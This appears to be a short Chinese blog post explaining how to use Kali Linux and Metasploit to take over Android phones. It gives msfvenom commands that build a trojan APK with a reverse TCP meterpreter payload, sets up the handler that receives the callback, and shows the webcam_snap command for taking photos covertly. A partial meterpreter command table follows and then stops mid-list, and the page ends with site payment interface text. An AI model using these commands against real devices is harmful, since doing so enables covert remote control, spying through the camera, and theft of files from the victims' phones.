kali系统渗透android

本文介绍如何使用Metasploit生成Android平台的木马程序,并通过命令行进行远程控制操作,包括拍照、文件管理和系统命令执行等。

生成木马

msfvenom -p android/meterpreter/reverse_tcp lhost="192.168.1.8" lport=5000 R > /root/payload.apk

 运行msfconsole

msfconsole
use exploit/multi/handler

设置配置并启动

set payload android/meterpreter/reverse_tcp
set LhOST 192.168.1.8
set lport 5000
run

 拍照

webcam_snap

附命令

===========

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值